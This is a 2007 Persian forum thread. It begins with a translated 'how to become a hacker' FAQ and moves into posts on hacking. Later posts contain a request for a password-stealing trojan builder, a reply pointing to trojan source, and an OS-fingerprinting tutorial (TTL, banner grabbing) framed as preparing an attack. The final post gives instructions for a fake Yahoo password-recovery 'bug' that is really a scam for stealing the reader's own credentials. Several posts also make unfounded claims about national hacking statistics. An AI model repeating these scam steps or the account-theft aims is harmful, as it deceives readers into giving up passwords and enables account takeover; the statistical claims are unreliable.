تنها چيزی که با انجام اين کارها به دست می‌آوريد، شهرت يافتن به عنوان يک احمق است. هکرها حافظه‌ی طولانی مدتی دارند. ممکن است قبل از اينکه در ميان هکرها پذيرفته شويد، مجبور باشيد که سالها با سابقه‌ی دسته گلهايی که به آب داده‌ايد، زندگی کنيد.
مشکلات ناشی از اسامی مستعار يا هويت‌های مجازی نياز به شرح و توضيح بيشتری دارد: پنهان کردن هويت خود پشت يک نقاب رفتار بچه‌گانه (و احمقانه)ی افرادی از قبيل کرکرها، قفل‌شکنان و گونه‌هايی ديگر از زندگی سطح پايين است. هکرها هيچ‌وقت چنين کاری انجام نمی‌دهند. هکرها با کارهايی که انجام می‌دهند، افتخار می‌کنند و دوست دارند که اين کارها با نام واقعی آنها پيوند بخورد. پس اگر شما نقابی بر چهره داريد، آن را برداريد. در ميان هکرها آن نقاب شما را فقط به عنوان يک بازنده معرفی خواهد کرد.

mazi_z_PSP
24-05-2007, 22:07
منابع ديگر
پل گراهام مقاله‌ای به نام هکرهای بزرگ ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) و مقاله‌ی دیگری به نام در حال تحصیل ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشته است که حاوی اطلاعات زيادی است.
Peter Seebach گرداننده‌ی يک فهرست پرسش‌های متداول در مورد هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است. اين پرسش‌ها مخصوص مديرانی است که نمی‌دانند چگونه با هکرها رفتار بکنند.
مقاله‌ای به نام «چگونه يک برنامه‌نویس بشويم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» وجود دارد که يک مکمل عالی برای اين متن است. اين متن توصيه‌های با ارزشی در مورد کد نويسی، طرز فکر برنامه نويسان و چگونگی همکاری در يک تيم برنامه‌نويسی دارد.
همچنين من يک مقاله در مورد تاريخ جامعه‌ی هکرها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشته‌ام.
من مقاله‌ای به نام The Cathedral and the Bazaar ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نوشته‌ام که حاوی توضيحات بسياری در مورد نحوه‌ی کارکرد جامعه‌ی لينوکس و جنبش منبع‌باز است. من همچنين در Homesteading the Noosphere ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) مستقيماً به نتايج اين موضوع پرداخته‌ام.
Rick Moen مقاله‌ی فوق‌العاده‌ای در مورد اينکه «چگونه يک گروه کاربران لينوکس را اداره کنيم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» نوشته است.
من با Rick Moen در نوشتن مقاله‌ای به نام «چگونه سوالات خود را زيرکانه بپرسيم ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])» همکاری کرده‌ام. اين مقاله به شما کمک می‌کند سوالات خود را به روشی بپرسيد که راحت‌تر به جواب برسيد.
اگر شما به مطالبی در مورد چگونگی کارکرد کامپيوترهای شخصی، يونيکس يا اينترنت نياز داشتيد، مبانی کارکرد يونيکس و اينترنت ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.
اگر تصميم گرفتيد که نرم‌افزاری را منتشر کنيد يا الحاقيه‌هايی برای نرم‌افزارهای مختلف بنويسید، اين راهنمای قدم‌به‌قدم تمرين نحوه‌ی انتشار نرم‌افزارها ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را دنبال کنيد. اگر شما از شعرهای Zen خوشتان آمده، ممکن است مايل باشيد که Rootless Root: The Unix Koans of Master Foo ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.

mazi_z_PSP
24-05-2007, 22:08
فهرست پرسش‌های متداول

س: آيا شما به من هکر شدن را ياد می‌دهيد؟
ج: از زمانی که برای اولين بار اين مقاله را منتشر کردم، هر هفته چندين درخواست از افراد مختلف دريافت می‌کنم که از من می‌خواهند مهارت‌های هکری را به آنها ياد بدهم. ولی متاسفانه من وقت و انرژی کافی برای اين کار ندارم. پروژه‌های هکری خود من و مسافرت‌هايم به عنوان يک مدافع جنبش منبع باز، ۱۱۰٪ از وقت مرا می‌گيرد. حتی اگر وقت هم داشته باشم، هکری يک طرزفکر است و مهارت‌ها را بايد خودتان ياد بگيريد.
شما خواهيد ديد که هکرهای واقعی همواره می‌خواهند به شما کمک کنند اما اگر از آنها بخواهيد که تمام چيزهايی را که در مورد هکری بلدند را به شما ياد بدهند، آنها به درخواست شما اعتنايی نخواهند کرد. اول سعی کنيد که مهارت‌هايی را بدست آوريد. نشان دهيد که در حال سعی کردن هستيد و اينکه شما توانايی آنرا داريد که خودتان ياد بگيريد سپس از هکرهای ديگر يک سوال مشخص بپرسيد.
اگر شما می‌خواهيد برای راهنمايی گرفتن به يک هکر ميل بزنید، نکاتی وجود دارد که بايد از قبل آنها را بدانيد:
اولاً ما متوجه شديم افرادی که در نوشتن نامه‌های خودشان کم‌توجه هستند، معمولاً در فکر کردن نيز بی‌دقت تر از آن هستند که بتوانند يک هکر خوب بشوند. پس دقت کنيد تا کلمات را با املای صحيح بنويسيد و دستور زبان را درست به کار برده و از نشانه‌گذاری خوب استفاده کنيد. در غير اينصورت احتمالاً به درخواست شما توجهی نخواهد شد.
ثانياً هيچ‌گاه درخواست نکنيد که جواب شما به آدرسی فرستاده شود که با آدرس ايميلی که شما از آن نامه را فرستاده‌ايد، متفاوت است. افرادی که چنين کارهای را انجام می‌دهند، معمولاً کسانی هستند که از حسابهای دزديده شده استفاده می‌کنند و ما علاقه‌ای نداريم که به دزدها کمک کنيم.

س: چگونه می‌توانم شروع کنم؟
ج: بهترين روش برای آغاز رفتن به جلسات گروه کاربران لينوکس است. شما می‌توانيد چنين گروه‌هايی را در صفحه‌ی اصلی اطلاعات لينوکس (LDP) ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) پيدا کنيد. احتمالاً يکی از اين گروه‌ها در نزديکی شما قرار دارد و شايد به يک کالج يا دانشگاه وابسته باشد. اگر از اعضای گروه بخواهيد، به شما يک لينوکس می‌دهند و مطمئناً به شما در نصب و راه‌اندازی آن کمک خواهند کرد.

س: چه وقت بايد شروع کنم؟ آيا سن من برای يادگيری بالاست؟
ج: در هر سنی که مشا قصد داريد شروع کنيد،يک سن خوب است. اکثر افراد در بازه سنی۱۵ تا ۲۰ سال علاقه‌مند می‌شوند ولی من استثنائاتی را در هر در دو جهت می‌شناسم.

س: چه مقدار طول می‌کشد تا من هکری را ياد بگيرم؟
ج: اين بستگی به مقدار هوش و پشتکار شما دارد. اکثر افراد اگر بر روی اين موضوعات تمرکز کنند، مهارت‌های مورد انتظار را در طی ۱۸ ماه تا ۲ سال بدست می‌آورند. اما فکر نکنيد که تصور شما به همين جا ختم می‌شود. اگز شما يک هکر واقعی باشيد، مابقی عمرتان را به يادگيری و بهتر نمودن مهارت‌هايتان اختصاص خواهيد داد.

س: آيا ويژوال بيسيک و سی‌شارپ زبانهای برنامه‌نويسی خوبی برای شروع یادگيری هستند؟
ج: اگر شما چنين سوالی را می‌پرسيد، مطمئناً به اين معنی است که شما قصد داريد که هکری را تحت ويندوز ياد بگيريد. اين ايده به خودی خود بد است. هنگامی که من سعی برای هک کردن تحت ويندوز را با سعی برای يادگيری رقص در لباس شوالیه، مقايسه کردم، شوخی نمی‌کردم. به طرف ويندوز نرويد چون خيلی بد است و هيچ‌وقت خوب نخواهد شد.
مشکلات خاصی در رابطه با ويژوال بيسيک و سی‌شارپ وجود دارد. مهم‌ترينشان اين است که کد توليد شده توسط آنها حمل‌پذير نيست (قابل اجرا در سيتم عامل ديگری نيست). گرچه نمونه‌های اوليه‌ای از نرم‌افزارهای منبع‌باز توسط آنها نوشته شده است، اما استانداردهای ECMA به جز دسته‌ی کوچکی از خصوصيات رابط کابری آنها از بقيه پشتيبانی نمی‌کند. تحت ويندوز اکثر پشتيبانی کتابخانه‌ای داده‌ها به يک شرکت خاص (مايکروسافت) تعلق دارد.
اگر شما کاملاً مراقب امکاناتی که از آنها استفاده می‌کنيد -بيشتر از آنچه يک فرد مبتدی می‌تواند- نباشيد، به طور قطع سرانجام در يکی از سکوهايی که مايکروسافت از آنها پشتيبانی می‌کند، محدود خواهيد شد. اما اگر شما با يونيکس آغاز بکنید، زبانهای برنامه‌نويسی خيلی بهتری با کتابخانه‌های بهتری خواهيد داشت.
ويژوال بيسيک فوق‌العاده مزخرف است و مانند بيسيک‌های ديگر زبانی است که طراحی بسيار ضعيفی دارد و شما را به روش‌های غلط در برنامه‌نويسی عادت می‌دهد. از من نخواهيد که جزئيات آن را شرح دهم. اين توضيحات صفحات يک کتاب را پر می‌کنند. به جای بيسيک يک زبان برنامه‌نويسی خوب طراحی شده را ياد بگيريد.
يکی از عادت‌های بد وابسته شدن به ابزار کتابخانه‌ای و لوازم توسعه‌ی يک شرکت خاص است.
اساساً هر زبانی که به طور کامل حداقل توسط لينوکس يا يکی از BSD ها پشتيبانی نشود و يا حداقل تحت سيستم‌عامل‌های سه شرکت متفاوت کار نکند، يک زبان ضعيف برای هکری است.

mazi_z_PSP
24-05-2007, 22:10
اینا پرسش هايی هستش که کاربران از نقاط مختلف جهان فرستادن و جواب داده شده . فکر کردم گزاشتنش خالی از لطف نباشه

mazi_z_PSP
24-05-2007, 22:11
س: آيا شما به من کرک کردن را ياد می‌دهيد يا به من کمک می‌کنيد تا يک سيستم را کرک کنم؟
ج: نه! هر کسی که بتواند بعد از خواندن اين متن بتواند اين پرسش را بپرسد، احمق‌تر از آن است که تعليم داده شود. حتی در صورتی که من برای آموزش وقت داشتم. اگر من ايميلی با چنين درخواستی دريافت کنم، به آن توجه نخواهم کرد يا با بی ادبی زياد به آن پاسخ خواهم داد.

س: چگونه می‌توانم کلمه‌ی عبور شخص ديگری را بدست آورم؟
ج: اين کرک کردن است.

س: من چگونه می‌توانم ايميل‌های افراد ديگری را بخوانم يا کنترل کنم؟
ج: اين کرک کردن است.

س: چگونه می‌توانم مجوز اپراتوری را در شبکه‌های IRC بدست بياورم؟
ج: اين کرک کردن است.

س: من کرک شده‌ام. آيا شما می‌توانيد به من کمک کنيد تا جلوی حملات بعدی را بگيرم؟
ج: نه تابحال هر وقت که چنين پرسشی از من پرسيده شده است، از طرف افرادی بوده که از ويندوز استفاده می‌کردند. هرگز امکان ندارد که به طور کامل ويندوز را بر ضد حملات کرکرها مصون ساخت. کدها و معماری آن اساساً دارای نقاط ضعف زيادی است که تلاش برای ايمن کردن ويندوز را به تلاش برای خالی کردن يک قايق با آبکش تبديل می‌کند. تنها روش قابل اعتماد برای جلوگيری از حملات کرکرها مهاجرت به لينوکس يا سيستم‌عامل ديگری است که طراحی آن حداقل قابليت ايمن سازی را داشته باشد.

س: من با نرم‌افزاری در ويندوز مشکل دارم. آيا شما به من کمک می‌کنيد؟
ج: بله! به اعلان داس برويد و "Format c:" را نوشته Enter بزنيد. تمام مشکلاتی که تابحال داشته‌ايد در طی چند دقيقه برطرف خواهدشد.

س: در کجا می‌توانم هکرهای واقعی را برای بحث پيدا کنم؟
ج: بهترين راه يافتن يک گروه کاربران يونيکس (يا لينوکس) در نزديکی محل زندگی شما و رفتن به جلسات آنهاست. (شما می‌توانيد لينک‌هايی به فهرست‌های متعددی از گروه‌های کاربران را در سايت LDP ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) واقع در ibiblio بيابيد)
در گذشته من گفته بودم که شما هيچ هکر واقعی را در IRC نخواهيد يافت. ولی اين موضوع اکنون تغيير کرده است. گروه‌هايی از هکرهای واقعی که به مسائلی مانند GIMP و Perl علاقه‌مندند اکنون صاحب کانال‌های IRC هستند.

س: آيا شما می‌توانيد کتابهايی مفيد در زمينه‌ی هک و موارد مرتبط به من معرفی کنيد؟
ج: من گرداننده‌ی فهرست راهنماهای لينوکس ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) هستم که ممکن است به درد شما بخورد. Loginataka ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) نيز ممکن است برای شما جالب باشد.
برای آشنايی با پايتون، مطالب نوشته شده در سایت پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را ببينيد.

س: آيا برای هکر شدن لازم است رياضيات خوبی داشته باشم؟
ج:نه. هکری از رياضيات و جبر، کم استفاده می‌کند. بخصوص شما معمولاً به مثلثات، حساب ديفرانسيل و انتگرال و آنالبز عددی نيازی نداريد. (استثناهايی در اين مورد در زمينه‌ی برخی از کاربردهای خاص کامپيوتر مانند گرافيک کامپيوتری وجود دارد.)
دانستن منطق مجرد و جبر بولی خوب است. برخی از شاخه‌های رياضيات متناهی (مانند تئوری مجموعه‌های متناهی، ترکيبيات و تئوری گراف‌ها) نيز می‌تواند مفيد باشد. مهم‌تر از همه شما بايد توانايی تفکر منطقی و دنبال کردن حلقه‌هايی با حالات مشخص را مانند رياضيدانان داشته باشيد. گرچه بيشتر شاخه‌های رياضيات به شما کمکی نخواهند کرد، اما شما به نظم و هوشياری برای به کار بردن رياضيات نياز داريد. اگر شما هوش کمی داريد، اميد چندانی برای هکر شدن شما وجود ندارد. اما اگر شما انظباط کمی داريد، بهتر است که آن را زياد کنيد.
به نظر من يکی از راه‌های خوب برای فهميدن اينکه شما توانايی آن را داريد يا نه، تهيه‌ی يک کپی از کتاب ?What is the name of this book (اسم اين کتاب چيست؟) نوشته‌ی Raymond Smullyan است. معماهای سرگرم کننده‌ی اين کتاب به روح هکری بسيار نزديک هستند. توانايی حل آنها نشانه‌ی خوبی است ولی لذت بردن از حل آنها بهتر است.

س: بايد اول کدام زبان برنامه‌نويسی را ياد بگيرم؟
ج: XHTML (جديدترين نسخه‌ی HTML). اگر شما از قبل آن را نمی‌دانيد، تعداد بسيار زيادی کتاب با ظاهر فريبنده، بيش از حد فشرده و بد و متاسفانه تعداد کمی کتاب خوب برای HTML وجود دارد. يکی از کتابهايی که من بيشتر دوست دارم HTML: The Definitive Guide ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است.
اما HTML يک زبان کامل برای برنامه‌نويسی نيست.اگر آماده‌ی شروع برنامه‌نويسی هستيد، من توصيه می‌کنم با پايتون ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) شروع کنيد. مطمئناً شما افراد زيادی را خواهيد ديد که پرل را توصيه می‌کنند. مسلماً پرل هنوز پرطرفدارتر از پايتون است.اما پرل (به نظر من) برای يادگيری سخت‌تر و طراحی پايتون از آن بهتر است.
زبان سی بسيار مهم است اما از پايتون و پرل بسيار سخت‌تر است. به عنوان اولين زبان برنامه‌نويسی سعی نکنيد آن را ياد بگيريد.
اگر شما کاربر ويندوز هستيد، به ويژوال بيسيک قانع نشويد. ويژوال بيسيک شما را به روش‌های بد برنامه‌نويسی عادت می‌دهد و قابل انتقال به سکوی ديگری نيست. از آن دوری کنيد.

س: برای هکر شدن به چه نوع سخت‌افزاری نياز دارم؟
ج: در گذشته کامپيوترهای شخصی تقريباً کم قدرت بودند و حافظه‌ی ضعيفی داشتند که اين‌ها محدوديت‌های خارجی را به روند يادگيری هکرها تحميل می‌کردند. اما از چند وقت پيش ديگر اينگونه نيست. هر سيستم بالاتر از 486DX50 برای کارهايی مانند توسعه‌ی نرم‌افزارها، اجرای X Window و ارتباطات اينترنتی به قدر کافی قدرتمند است. کوچکترين هارد ديسکی که امروزه می‌توانيد تهيه کنيد، به قدر کافی بزرگ است.
مهم‌ترين مسئله‌ای که بايد در انتخاب يک سيستم بدانيد اين است که آيا سخت‌افزار آن با لينوکس (يا BSD، اگر بخواهيد از آن استفاده بکنيد) سازگاری دارد يا نه. اين نيز برای اکثر سيستم‌های جديد صادق است. تنها قسمت مشکل‌ساز در اين زمينه مودم است. بعضی از سيستم‌ها سخت‌افزارهای مخصوص ويندوز دارند که با لينوکس کار نمی‌کند.
يک فهرست پرسش‌های متداول در مورد سازگاری سخت‌افزارها وجود دارد. اين ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) جديدترين نسخه‌ی آن است.

س: من می‌خواهم در يکی از پروژه‌ها همکاری کنم. آيا شما می‌توانيد در انتخاب يک پروژه به من کمک کنيد؟
ج: نه! به دليل آنکه من ميزان هوش و علاقه‌مندی شما را نمی‌دانم.شما بايد خودتان انگيزه‌ی لازم را برای اين کار داشته باشد در غير اينصورت آن را انجام نخواهيد داد. اگر فرد ديگری مسيری را برای شما انتخاب کند، در اکثر موارد نتيجه‌ای نخواهد داشت.
اين روش را امتحان کنيد: اطلاعيه‌ی پروژه‌هايی که توسط Freshmeat ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) منتشر می‌شود را برای چند روز مرور کنيد. هنگامی که يکی از آن ها به نظرتان جالب آمد و دوست داشتيد که روی آن کار کنيد، به پروژه بپيونديد.

س: آيا لازم است من از مايکروسافت متنفر باشم و سعی کنم به آن ضربه بزنم؟
ج: نه نيازی نيست. من نفرت انگيز بودن مايکروسافت را انکار نمی‌کنم اما فرهنگ هکرها بسيار پيش از مايکروسافت وجود داشته و مدتها بعد از آن نيز وجود خواهد داشت. بهتر است آن انرژی که می‌خواهيد بر روی نفرت از مايکروسافت می‌خواهيد صرف کنيد، را بر روی دوست داستن هنرتان صرف کنيد و کدهای خوبی بنويسيد. اين بدون آنکه از شخصيت شما بکاهد، به حد کافی به مايکروسافت ضربه می‌زند.

س: مگر نرم‌افزارهای منبع‌باز، درآمد برنامه‌نويسان را از آنها نمی‌گيرند؟
ج: به نظر می‌آيد که اينگونه نباشد. تابحال شرکت‌های نرم‌افزاری منبع‌باز بيشتر از بيکار کردن افراد، موقعيت‌های شغلی ايجاد کرده‌اند. اگر سفارش دادن برنامه برای نوشته شدن يک اقتصاد شبکه‌ای است، دست گشيدن از اين کار باعث می‌شود که آن نرم‌افزار نوشته نشود. يک برنامه‌نويس حقوق خودش را -مستقل از اينکه برنامه پس از نوشته شدن قرار است منبع‌باز باشد يا نه- می‌گيرد. مهم نيست که چه مقدار نرم‌افزارهای رايگان نوشته می‌شوند. همواره نرم‌آفزارهای جديد و سفارشی مورد نياز است. من در صفحه‌های منبع‌باز ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) در اين مورد بيشتر نوشته‌ام.

س: چگونه بايد شروع کنم؟ از کجا می‌توانم يک لينوکس رايگان بدست آورم؟ ج: من در قسمت‌های مختلفی از اين صفحه به محل‌هايی که می‌توانيد از آنها يونيکس‌های رايگان متداول را پيدا کنيد، اشاره کرده‌ام. برای هکر شدن شما به انگيزه، ابتکار و توانايی يادگيری بدون معلم نياز داريد. از همين الان شروع کنيد...

تکنیک برتر
25-05-2007, 03:52
البته دوستان تا اونجايی که من اطلاع دارم يکی از بزرگ ترين کشور های جهان تو هک روسيه هستش.و این رو هم ميدونم که نسخه های اوليه برنامه های معروف مثل ويستا تو این کشور هک ميشن.
حرف شما متین ولی روسیه تعداد نفراتش کرمتر از ایرانه یعنی از 1 میلیون جمعید فقط 10هزار نفرشون اینکاره ان تازه از 10 هزار نفر 10 نفرشون می تونن ویستارو هک کنند روسیه با رنگ زرد درست رنگ شده یعنی قرمز اصل نارجنی دوم زرد سوم یعنی روسیه زرد مثلا ایران نه کل کشور بلکه فقط تهرا ن از 5 میلیون نفر 4 میلیونش طریقه هک و بلدن حالا در چه زمینه ای ایران در سالهای قبل 75 بزرگترین صادر کننده نرم افزار بود ولی بعد از اینکه سازمان بینلل مللی اعلام کرد که نرم افزار های ایرانی ویروسی هستند از صادر نرم افزار منع شد و مردم ایران شروع به هک و ویروس نویسی کردن به نظر شما کدوم کشور تو آنتی ویروس نویسی اول فکرشم به ذهنتون نمیرسه ایران بله اگه به ایران اجازه صادر کنن ایران تو جهان اول می شه الان در تمامی شرکت های دولتی ایران از آنتی ویروس های ایرانی استفاده می شه می دونی چرا چون هیچ ویروسی از دست اونا در نمی ره تمامی شرکتهای آنتی ویروس نویسی حداقل 10 تا از کارمنداشون ایرانین چون از 100% ویروس های منتشر شده 55% مال ایرانه ؟!!!
مثال از هک نوجوان 15 ساله 250 میلیون تومان از حصابی به حصاب پدرش واریز کرد . مرد آذربایجانی با کارت تلفن که روش برنامه ریزی کرده بود از آبربانکها پولهای کلانی برداشت کرد.
پسر نوجوان 17 ساله حصاب بانکی جابجا کرد .و.........
نتیجه گیری کنید اگه آمریکایی بخواد اینکارو بکنه با دستگاهای رمز خوان به سراغ آبر بانکها میره نه با کارت تلفن برنامه ریزی شده مثلا 10 تا هکر بزرگ جهان این دستگا هو اختراع کردن و چجوری دست مردم چرخیده .... و همه استفاده کردن و یک سری از کشورها مثل ایران می گن آمریکا همشون هکرن هکر به کسی میگن که خود هک کنه نه از ابداعات دیگران استفاده کنه.

mazi_z_PSP
25-05-2007, 13:13
صد در صد که این طور هست تکنيک جان.حتی اگر مايکروسافت به ایران برايه هک شک نميکرد اونها راهت تر ميتونستند ويستا رو تو کشور هک کنن و خودکفا بشن!! راستی این که گفتی ایرانی ها از آنتی ويروس های خودی استفاده ميکنن برام جالب شد.ميشه اسمشون رو بگی؟ البته این رو ميدونم که تمام شرکت های ایرانی از برنامه های حساب داری خودی استفاده ميکنن که بسيار خوب هم عمل ميکنن اما قيمت بالايی دارن.و این مسأله در مورد آنتی ويروس هم همينطوره نه؟ منظورم اینه که برای این شرکت ها استفاده از آنتی ويروس های خارجی مثل McAfee و Bitdefender و Kaspersky به صرفه تر نيست؟

mazi_z_PSP
25-05-2007, 13:15
البته ایرانی ها در مساءل هک و کلاه گزاری و .... سر آمده همه هستن چون نبوغ و خلاقيت مثال زدنی دارن.که من به این موضوع واقعا افتخار ميکنم

تکنیک برتر
26-05-2007, 04:12
سلام اجازه نام بردن اسم ندارم ولی در همین حد بگم که McAfee و Bitdefender و Kaspersky توجیب بقلش جا می گیره یه آنتی ویروسی تقریبا 2 ساله وارد باز ایران شده که ایرانی هم است اسمشو یادم نیست ولی قیمتش زیاده ولی عملا کار سازه.

salar2010
26-05-2007, 07:06
یه خواهش داشتم که خیلی حیاتیه !


اقا من به یک تروجان میکر نیاز دارم ! البته نه به سورسش فعلا به خود برنامه نیاز دارم اخه یه کشف باورنکردنی کردم !!! که بعدا به همتون اموزش میدم الان چیزی که من نیاز دارم اینه که یک کسی لطف کنه و یک تروجان میکر از همین ها که پسورد و یورز طرف رو واسمون ارسال میکنن ! خدایی خیلی لازم دارم حداقل چیزی باشه که حجم فایلی که می سازه کم باشه ! و حداقل خودشون از کاردکردش مطمعن باشه


به هرحال من منتظرم و درضمن اگه تونستید حتما بهم پیام خصوصی بفرستید


موفق باشید

mazi_z_PSP
26-05-2007, 12:48
یه خواهش داشتم که خیلی حیاتیه !


اقا من به یک تروجان میکر نیاز دارم ! البته نه به سورسش فعلا به خود برنامه نیاز دارم اخه یه کشف باورنکردنی کردم !!! که بعدا به همتون اموزش میدم الان چیزی که من نیاز دارم اینه که یک کسی لطف کنه و یک تروجان میکر از همین ها که پسورد و یورز طرف رو واسمون ارسال میکنن ! خدایی خیلی لازم دارم حداقل چیزی باشه که حجم فایلی که می سازه کم باشه ! و حداقل خودشون از کاردکردش مطمعن باشه


به هرحال من منتظرم و درضمن اگه تونستید حتما بهم پیام خصوصی بفرستید


موفق باشید
دوست عزيز اینجا نميتونيم برنامه از پيش ساخته شده بهت بديم اما آموزش ساخت و سورس رو ميتونيم.اگر سورس کد يه تروجان رو ميخوای ميتونی تو تاپيک ويروس و آنتی ويروس نويسی بگيری که تو يکی از صفحاتش به صورت پی دی اف هستش

mazi_z_PSP
26-05-2007, 12:49
يک سری نکات و آموزش برايه نرم افزار Snifer پيدا کردم که موقعی که وقت کردم همشو ميزارم.Please wait...

mazi_z_PSP
26-05-2007, 20:46
شناسایی سیستم عامل سرورها
خوب وقتی ما به خواهیم به یه سرور حمله کنیم باید بدونیم مه اون سرور از چی ساخته شده البته ما میتونیم از این روش هایی که میگم
برای هک سیستم های شخصی استفاده کنیم خوب بحث رو شروع میکنم:
روش شناسایی TTL:
این روش رو همتون میشناسید بله استفاده از فرمان PING است خوب وقتی شما یه SERVER رو pING میکنید
یک سری بسته هایی به SERVER از سیستم شما فرستاده میشود که ما در جواب این بسته ها یه سری اطلاعات میگیریم
فرمان PING را من روی یه سیستم شخصی امتحان کردم به این شکل میدهد:
فرمول pING: PING +IP
C:\WINDOWS (file:///C:/WINDOWS)> PING 203.168.117.8
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
REPLY FROM 203.168.117.8:BYTES=32TIME< 1MS TTL=128
خوب ما با بقییه جملات کاری نداریم فقط فهمیدیم که مقداره TTL=128 هستش یعنی سیستم عامل ویندوز هست
من TTL های سیتم های عامل رو براتون گذاشتم نگاه کنید(VERSIAN OF TTL)
WINDOWS 9X/NT INTEL =32
WINDOWS 2000 INTEL =128
DIGITALUNIX 4.0 ALPA =60
UNISYS XMAINFRAME =64
LINUX 2.2X INTEL =64
FTX (UNIX) 3.3STRTUS =64
SCO COMPAQ =64
NETWARE 4.11 INTEL =128
AIX 4.3X IBM/R6000 =60
AIX 4.2 IBM/R6000 =60
CISCO 11.2 =7507 60
CISCO 12.02 =514255
IRIX 6.0 SGI =60
نکته: مقداره TTL در هر ROUTER به یک میزان کم میشود ما برای اینکه تعداد ROUTER
ها رو با استفاده از فرمان TRACE در DOS به فهمیم این دستور این است
C:/WINDOS> TRACERT IP
نقاط ضعف این روش: 1)یه سرور میتونه TTL جعلی بسازه 2)TTL هافقط نوع سیتم عامل را میدهند


و VERSION سیتم عامل را به ما نمی دهد مثلا LINUX RED-HAT 6.1,LINUX RED HAT 72
3) سیتم هایی که فایر وال دارند قابل PING شدن نیستند
روش BANNER GRABBING :
هر WEB SEVERیا FTP SERVER به طور پیش فرض یه سرتیتر به نام BANNER داردکه
ما با گرفتن BANNER یک SERVER میتونیم به نسخه عامل ان پی ببریم مثلا اگه ما SEVER
TELNET کنیم میدهد
خوب من الان میخام به SERVER سایت INSECURD.ORG
TELNET> TELNET INSECRUD.ORG.80
connect to insecurd.org......
get index.html(or anything) [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
host:server (or anything)
content-lenght: 10(or anything
hhtp/1.1 400 bad reqoust
date:tue,16 november 2002 11.30.00 gmt
server:apache/2.00.39(unix) mod-perl/1.99-04-devperl/v 5.6.1
content-lenght:386
connection:close
نقاط ضعف روش baner grabbing:la; مشکل این رئش این است که یک مدیر سایت میتواند تمام BANNER ها رو
حذف کند من البته از این روش زیاد استفاده کردم خوب جواب میده
روش انگشت نگاری (FINGERPRINTING METHOD)"
بهترین روش شناساییست که با استفاده از ظبط بسته های ارسالی از کامیوتر مقصدوثبت فاصله زمانی و دریافت پیام
خطا و..... شناسایی کنیم و 4 روش دارد 1)FEATURES OF TCP IMPLEMENTATION
2)ICMP ERROR MESSAGE QUENCHING
3)SNIFING DATA PACKETS
4) INITIAL SEQUNCE NUMBER SAMPELING
راستی بروبچ من روش SNIFING رو توصیه میکنم براتو اگه شد یه SNIFER توپ میذارم

mazi_z_PSP
26-05-2007, 20:49
هك ايدي


در روزهای اخیر یکی از دوستام در مشهد یک اشکالی (BUG) درسیستم
پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) کشف کرد که هنوز توسط یاهو پیدا نشده بنابرین شما باید هر چه سریع تر از این اشکال سو استفاده کنید.
ما برای سو استفاده از چه روشی استفاده خواهیم کرد؟
ما برای گرفتن پسورد از روش سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) استفاده می کنیم و خود را یک مستر(MASTER) معرفی می کنیم و به سیستم فرمان می دهیم که پسورد ما را غیب کند(Hidden) و دوباره برای ما نشان دهد (Show) و بفرستد و در بین این کار از اشکال (BUG) باید سو استفاده کنیم. ما پسورد و ID خود را به آن میدهیم و ایمیل را به شخصی که می خواهیم پسورد را بدست آوریم تغییر می دهیم در نتیجه سیستم به اشتباه پسورد قربانی را به ما می فرستد. به همین سادگی!!!!
مزیت این روش: بدون تعلیمات و دانش قبلی می توانید به راحتی پسورد یک نفر را بدست آورید و نیازی به برنامه ندارد!
بدی این روش: البته نمی شه گفت بدی.مدت زمانی که پسورد را به شما میدهد بستگی به تعداد نامه هایی که به در سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) هست.برای جواب دادن به هر نامه حدود 1 دقیقه طول می کشد.حالا خودتون میتوانید حساب کنید نامه ی پسورد خود را کی پس میگیرید.
روش(بخش اصلی):
1.برید تو ایمیل خود و تو قسمت Compose.
2.در قسمت TO باید ایمیل سیستم پس گرفتن پسورد گمشده یاهو(Yahoo Lost Password Recovery) را بنویسید که هست>>>>cookies_pasword@yahoo.com<<<<<<
3.در Subject ایمیل کامل خود را بنویسید(ID@yahoo.com (ID@yahoo.com)).
4.کدی که کمی پایین تر پیدا میکنید کپی COPY کنید و داخل پیغام خود PASTE کنید.(اول کپی کنید بعد تغییر دهید)
5.حالا باید در کد کمی تغییر ایجاد کنیم.
